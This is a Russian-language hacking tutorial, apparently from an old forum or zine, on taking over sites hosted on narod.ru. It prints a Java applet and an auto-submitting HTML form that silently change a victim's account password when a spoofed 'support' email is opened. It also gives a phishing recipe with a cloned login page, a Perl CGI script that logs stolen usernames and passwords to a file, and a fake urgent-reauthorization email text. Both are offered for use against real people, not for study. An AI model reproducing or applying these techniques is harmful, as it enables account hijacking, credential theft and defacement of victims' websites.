Как обычно берем наш любимый narod.ru , и ломаем его сайты. К примеру возьмем сайт wwwulashir.narod.ru
и дефейсим его, как? да легко! Ты же знаешь что пасс на сайт , такой же как и к мылу. так вот пишим
и вставляем его в письмо, (незабудь про соответствующий текст) и мыло лучше сделать support@narod.ru
или administrator@narod.ru, ну короче ты понял! Вот те листинг его надо вставить в письмо.
<applet code=readr.class name=readrie codebase="_ПУТЬ_/" width=320 height=240 >
SET Java On
</applet>
import java.applet.*;
import java.awt.*;
mport java.net.*;
public class readrie extends Applet
{
public void paint(Graphics g)
{
try
{
URL myURL=new URL("_ПУТЬ_editprofil.html");
getAppletContext().showDocument(myURL,"_self");
}
catch (Exception e)
{
g.drawString("Error", 10, 10);
}
}
}
editprofil.html ( не забудьте отредактировать ИМЯ_ПОЛЬЗОВАТЕЛЯ и НОВЫЙ_ПАРОЛЬ)
<html>
<body>
<form method=post action="http://koi.narod.ru/cgi-bin/modifyuser?modify">
<input type="hidden" name="Username" value="ИМЯ_ПОЛЬЗОВАТЕЛЯ ">
<input type="text" name="RealName" value="A. V. Komlni">
<input type="text" name="Forward" value="">
<input type="password" name="Password" value=" НОВЫЙ_ПАРОЛЬ ">
<input type="password" name="Password_Verify" value="НОВЫЙ_ПАРОЛЬ ">
<input type=checkbox name="Flags.DoNotKeepMail" > Не сохранять почту при пересылке
<input type="submit" value="Сохранить">
<input type="reset" value="Восстановить">
</form>
<SCRIPT LANGUAGE="JavaScript">
document.forms[0].submit();
</script>
</body>
</html>
Все скрипт готов, кстати на народе поста глюканая, так что если файл будет вложением, то Messenger откр
оет его автоматически. Еу а посли ты сам знаешь как попасть на сайт!!!
Удачи те друг!!!
2
Вот сидел я и решил всё таки написать чё-нить По большому настоянию Eraser. Основа статьи это социальная инженерия, о которой уже было написано не мало. Не буду повторяться. Этот трюк можно провести со всеми новичками в сети Интернет. А рассматривать мы его будем уже на «банальном» хостинге narod.ru.(Повторюсь: его можно проделать на любом бесплатном хостинге, да даже и на платном моно попробовать Начнём для проведения нижеописанных действий вам понадобятся:
1. Мозги
2. Руки
3. Хостинг с поддержкой CGI
4. Небольшое знание HTML
И так ищем жертву… У нас она будет xxx.narod.ru. Вообще для этого случая нужно искать не заброшенный сайт. И чтобы в контактах было мыло типа xxx@narod.ru Теперь нагло сдираем face народа Подправляем его, как надо, вставляем туда форму:
Ещё надо написать write.cgi:
&GetFormInput;
$name=$field{'name'};
$pass=$field{'pass'};
sub GetFormInput {
(*fval) = @_ if @_ ;
local ($buf);
if ($ENV{'REQUEST_METHOD'} eq 'POST') {
read(STDIN,$buf,$ENV{'CONTENT_LENGTH'});
}
else {
$buf=$ENV{'QUERY_STRING'};
}
if ($buf eq "") {
return 0 ;
}
else {
@fval=split(/&/,$buf);
foreach $i (0 .. $#fval){
($name,$val)=split (/=/,$fval[$i],2);
$val=~tr/+/ /;
$val=~ s/%(..)/pack("c",hex($1))/ge;
$name=~tr/+/ /;
$name=~ s/%(..)/pack("c",hex($1))/ge;
if (!defined($field{$name})) {
$field{$name}=$val;
}
else {
$field{$name} .= ",$val";
}
}
}
return 1;
}
open (OUTFILE, ">>pass.txt");
print OUTFILE "$name";
print OUTFILE "\n$pass";
print OUTFILE "\n=======END=======\n\n";
close (OUTFILE);
print "Location: http://your_redirect_URL\n" ;
Последняя строчка это перенаправление. Лучше послать на главную страницу народа. Всё наш сайт мы подготовили.
Теперь пишем этому "карапузу" (прим. Eraser'a : телепузу =)) письмо с анонимного мыла от support@narod.yandex.ru вида: "Здравствуйте ваш сайт пытались взломать и вам срочно не позже чем через 96 часов
надо пройти повторную авторизацию. Идите по ссылке(ага вот тута он и отдаст нам пароль) а ссылочка, то вы скажите видно будет, что не народовская... А я скажу вам нифига... А зачем нам nslookup? Вот так вот. короче ссылка будет вида: IP_ВАШЕГО_САЙТА/ sign.html . Усё готово.. теперь токо надо ждать .
Дополнение:
В доставание пароля вам поможет ваша фантазия при написание письма лопуху...